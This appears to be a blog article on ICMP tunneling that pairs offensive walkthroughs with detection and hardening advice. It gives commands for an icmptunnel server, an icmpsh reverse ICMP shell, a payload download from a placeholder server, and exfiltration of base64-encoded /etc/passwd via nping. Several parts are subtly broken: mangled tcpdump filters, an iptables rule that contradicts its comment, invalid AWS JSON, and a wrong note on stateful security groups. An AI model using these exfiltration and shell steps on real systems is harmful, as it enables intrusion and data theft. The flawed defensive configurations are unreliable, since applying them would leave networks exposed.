The Ultimate Guide to Stealthy Network Reconnaissance: How Hackers Bypass Firewalls Using ICMP Tunneling – And How to Stop It + Video

Listen to this Post

Featured Image

Introduction:

Internet Control Message Protocol (ICMP) is essential for network diagnostics (ping, traceroute), but attackers exploit its trust to create covert channels that bypass firewalls and exfiltrate sensitive data. ICMP tunneling encapsulates arbitrary data within legitimate-looking echo request/reply packets, allowing malicious traffic to masquerade as normal network operations. This article dissects real-world ICMP tunneling techniques used in red-team engagements and advanced persistent threats (APTs), providing step‑by‑step setup instructions for both Linux and Windows environments, plus robust detection and mitigation strategies.

Learning Objectives:

  • Understand how ICMP tunneling works and why traditional firewalls often fail to block it.
  • Set up a functional ICMP tunnel server on Linux and a client on Windows for covert data transfer.
  • Implement detection rules (Snort/Wireshark) and hardening measures (iptables, cloud security groups) to defend against ICMP‑based attacks.

You Should Know

  1. What Is ICMP Tunneling and Why It Works
    ICMP tunneling leverages the fact that many organizations allow ICMP echo requests (type 8) and replies (type 0) for diagnostic tools like ping. Attackers embed payloads inside the data field of these packets, creating a bidirectional communication channel. The tunnel can carry SSH sessions, DNS queries, or even file transfers, all hidden inside packets that appear benign.

How to test if ICMP is allowed through your firewall (Linux & Windows):

 Linux – send a single ping to an external host
ping -c 1 8.8.8.8

Windows – similar test
ping -n 1 8.8.8.8

If you receive replies, ICMP is permitted, making your network potentially vulnerable.

Quick demonstration of ICMP data payload (Linux):

 Send a ping packet with 1000 bytes of random data (simulating exfiltration)
ping -s 1000 -c 1 192.168.1.100

In a real tunnel, the payload is encoded or encrypted. This simple command shows how easily extra bytes can be added to a standard ICMP packet.

  1. Setting Up an ICMP Tunnel Server on Linux
    The most common tool for ICMP tunneling is `icmptunnel` (or ptunnel). Below is a step‑by‑step guide to turn a Linux machine into an ICMP tunnel server.

Step 1: Install dependencies and icmptunnel

sudo apt update && sudo apt install git build-essential
git clone https://github.com/jamesbarlow/icmptunnel
cd icmptunnel
make

Step 2: Disable ICMP echo responses on the server (to avoid interfering with the tunnel)

echo 1 | sudo tee /proc/sys/net/ipv4/icmp_echo_ignore_all

Step 3: Start the tunnel server

sudo ./icmptunnel -s 10.0.0.1  -s for server mode, assign a virtual IP

The tool creates a virtual network interface (tun0) that routes traffic through ICMP packets.

Step 4: Verify the interface and add routing

ip addr show tun0
sudo route add -net 10.0.0.0 netmask 255.255.255.0 dev tun0

Your server is now ready to accept tunneled connections from clients.

3. Creating an ICMP Tunnel Client on Windows

Windows lacks native ICMP tunneling tools, but you can use PowerShell with external binaries like `icmpsh` or the Windows port of ptunnel. Below is a practical method using `icmpsh` (a reverse ICMP shell) for Windows clients.

Step 1: Download icmpsh (attacker machine – Linux) and transfer to Windows

On Linux:

git clone https://github.com/inquisb/icmpsh
cd icmpsh

On Windows (PowerShell as Administrator):

 Download the icmpsh executable (assuming you host it on a web server)
Invoke-WebRequest -Uri "http://your-server/icmpsh.exe" -OutFile "C:\temp\icmpsh.exe"

Step 2: Disable Windows native ICMP reply (to avoid conflicts)

netsh advfirewall firewall add rule name="Block_ICMP" protocol=icmpv4 dir=in action=block

Step 3: Run the client, connecting to the Linux tunnel server

C:\temp\icmpsh.exe -t 192.168.1.100  Replace with your server's IP

The client will start sending ICMP echo requests with hidden command payloads. On the server side, you’ll receive a shell.

Alternative for file exfiltration using hping3 (Linux client, but adaptable):

 Encode a file and send it via ICMP packets to a Windows listener
hping3 -1 -d 1024 -E /path/to/file --file-pattern "%d" 192.168.1.50

(Note: Windows requires a custom listener like `npcap` + Python to decode.)

  1. Data Exfiltration via ICMP Payloads – Advanced Commands
    Attackers often exfiltrate sensitive files by breaking them into chunks inside ICMP packets. Here’s how to simulate this on Linux (commonly used during pentests).

Exfiltrate /etc/passwd using nping (part of Nmap):

nping --icmp -c 10 --data-string "username:$(cat /etc/passwd | base64 | head -c 100)" 192.168.1.100

The `–data-string` field carries base64-encoded chunks. On the receiving side, a simple `tcpdump` can capture and reassemble packets.

Capture and decode ICMP exfiltration on the server (Linux):

sudo tcpdump -i eth0 icmp and icmp[bash]=icmp-echo -v -X | grep "data"

This command filters incoming echo requests and prints their payload in hex/ASCII, revealing hidden data.

Windows‑side exfiltration using PowerShell + .NET sockets:

$icmpClient = New-Object System.Net.NetworkInformation.Ping
$data = [System.Text.Encoding]::ASCII.GetBytes("SECRET_DATA_HERE")
$reply = $icmpClient.Send("192.168.1.100", 1000, $data)

This script sends a custom ICMP packet with a string payload – a primitive but effective exfiltration method.

5. Detecting ICMP Tunneling with Snort / Wireshark

ICMP tunneling leaves forensic artifacts. Use these rules and filters to catch malicious ICMP traffic.

Snort rule to detect oversized ICMP packets (normal size < 100 bytes, tunneling often uses >500):

alert icmp any any -> any any (msg:"Potential ICMP Tunneling - Large Packet"; dsize:>500; sid:1000001;)

Snort rule to detect high frequency of ICMP packets (more than 10 per second):

alert icmp any any -> any any (msg:"ICMP Flood Possible Tunneling"; threshold: type both, track by_src, count 10, seconds 1; sid:1000002;)

Wireshark display filter to find suspicious ICMP payloads:

icmp.type == 8 and data.len > 200

Apply this filter, then inspect the `Data` field for non‑printable characters or repeated patterns (encryption/encoding signatures).

Linux command to detect anomalous ICMP traffic in real time:

sudo tcpdump -n 'icmp and (icmp[bash] = 8 or icmp[bash] = 0)' -c 1000 | awk '{print $1, $2, $NF}' | sort | uniq -c | sort -nr

This shows which source IPs generate the most ICMP packets – a spike often indicates tunneling.

6. Mitigation: Hardening Network Firewalls and Endpoints

Blocking ICMP entirely breaks legitimate diagnostics, but you can implement granular controls.

Linux iptables rules to restrict ICMP (allow only small, rate‑limited packets):

 Allow only ICMP echo requests with payload ≤ 64 bytes
sudo iptables -A INPUT -p icmp --icmp-type echo-request -m length --length 64: -j DROP

Rate‑limit ICMP to 1 packet per second per source
sudo iptables -A INPUT -p icmp --icmp-type echo-request -m limit --limit 1/sec --limit-burst 5 -j ACCEPT
sudo iptables -A INPUT -p icmp --icmp-type echo-request -j DROP

Windows Firewall advanced rule (PowerShell as Admin):

 Block all ICMPv4 echo requests except from authorized IPs (e.g., monitoring server)
New-NetFirewallRule -DisplayName "Block ICMP except from 10.0.0.5" -Direction Inbound -Protocol ICMPv4 -RemoteAddress 10.0.0.5 -Action Allow
New-NetFirewallRule -DisplayName "Block all other ICMP" -Direction Inbound -Protocol ICMPv4 -Action Block

Cloud hardening (AWS Security Group example):

{
"IpProtocol": "icmp",
"FromPort": 8,
"ToPort": 0,
"IpRanges": [{"CidrIp": "10.0.0.0/24", "Description": "Allow ping from internal subnet"}],
"IpRanges": [{"CidrIp": "0.0.0.0/0", "Description": "Block all other ICMP"}] // Actually AWS denies by default, but explicit deny is safer
}

Note: In AWS, security groups are stateful; you must explicitly allow ICMP replies (type 0) if you allow requests (type 8). Use separate inbound rules.

Endpoint detection (Linux – auditd monitoring for icmptunnel process):

sudo auditctl -w /usr/local/bin/icmptunnel -p x -k icmp_tunnel
sudo ausearch -k icmp_tunnel
  1. Advanced: Combining ICMP with DNS Tunneling for Red Teams
    Red teams often chain ICMP and DNS tunnels to evade deep packet inspection. For example, use `dnscat2` for DNS tunneling, then route traffic through an ICMP tunnel for double encapsulation. This makes detection extremely difficult.

Quick proof‑of‑concept using iodine (DNS tunnel) + icmptunnel:

 On server: start DNS tunnel (iodine) and then route its virtual interface through ICMP
sudo iodined -f -c -P password 10.0.0.1 tunnel.example.com
 Then run icmptunnel server on the same machine, binding to the iodine interface

Tools like `ptunnel-ng` already support proxy chaining. Always obtain proper authorization before testing.

Detection countermeasure: Monitor for DNS queries with abnormally long subdomains (e.g., randomdata.tunnel.example.com) combined with ICMP floods. Use Zeek (formerly Bro) scripts to correlate both protocols.

What Undercode Say:

  • Key Takeaway 1: ICMP tunneling is a low‑hanging fruit for attackers because default firewall rules rarely inspect packet payloads. Even a single `ping -s 1000` can exfiltrate a small file.
  • Key Takeaway 2: Mitigation is not about fully blocking ICMP (which breaks many network services) but about implementing rate‑limiting, payload size restrictions, and anomaly detection (e.g., using Snort or Suricata).

Analysis: The real danger lies in the false sense of security from “allowing ping only.” Modern red teams automate ICMP tunneling with tools like `icmpsh` and `ptunnel` to bypass corporate VPNs and cloud WAFs. Defenders must adopt a zero‑trust approach to ICMP: log every echo request, analyze payload entropy, and deploy endpoint detection that monitors for virtual tunnel interfaces (e.g., `tun0` creation). Training courses should include hands‑on labs where students exfiltrate a “flag” via ICMP and then build detection rules – this bridges the gap between theory and real‑world incident response.

Prediction:

By 2027, AI‑driven network detection systems (NDR) will automatically baseline ICMP traffic per device and flag any deviation in packet size, frequency, or entropy. However, attackers will pivot to using ICMP over IPv6 (where many organizations have even laxer rules) and encrypt payloads with ephemeral keys to evade entropy‑based detection. The arms race will force enterprises to deploy eBPF‑based sensors on Linux kernels and Windows Filtering Platform (WFP) callouts for real‑time ICMP inspection. Compliance frameworks (PCI DSS 4.0, NIST 800‑207) will explicitly require ICMP tunneling assessments in annual penetration tests, making this skill mandatory for every red teamer and blue teamer.

▶️ Related Video (68% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Infosec Cybersecurity – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky